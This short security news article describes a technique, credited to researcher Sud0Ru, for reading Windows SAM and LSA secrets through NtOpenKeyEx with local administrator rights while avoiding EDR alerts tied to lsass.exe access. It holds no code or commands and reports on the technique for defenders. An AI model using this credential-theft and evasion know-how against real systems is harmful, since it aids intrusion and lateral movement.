How Hackers Stealthily Exfiltrate Windows Secrets and Credentials While Bypassing EDR Detection

A new method for silently exfiltrating Windows secrets and credentials has emerged, allowing attackers to evade detection from most Endpoint Detection and Response (EDR) solutions. This technique enables attackers who have gained initial access to a Windows machine to harvest credentials for lateral movement across a network without triggering common security alerts. The Local Security Authority (LSA), which operates within the lsass.exe process, is the primary component responsible for managing sensitive information in Windows. The LSA utilises two in-memory databases that correspond to on-disk registry hives: the SAM database, which manages user credentials, and the Security database, which holds LSA secrets such as cached domain credentials and machine keys. Access to these databases is restricted by Discretionary Access Control Lists (DACLs), requiring SYSTEM privileges, and the sensitive data is encrypted, complicating direct retrieval.

According to researcher Sud0Ru, this new technique employs a two-pronged approach that leverages lesser-known Windows internals to bypass traditional security measures. By using the NtOpenKeyEx function, attackers can access the necessary registry hives without creating on-disk backups or requiring SYSTEM-level privileges, thus operating within the context of a local administrator. This method circumvents the high-risk activities that EDRs typically monitor, such as direct interaction with the lsass.exe process memory, which often triggers immediate alerts. By avoiding common detection methods, attackers can effectively exfiltrate sensitive data while remaining undetected, highlighting the need for enhanced security measures to protect against such sophisticated techniques. 

Categories: Credential Harvesting, Windows Security Architecture, Evasion Techniques 

Tags: Windows, Secrets, Credentials, LSA, lsass.exe, SAM Database, SECURITY Database, EDR, Exfiltration, Access Controls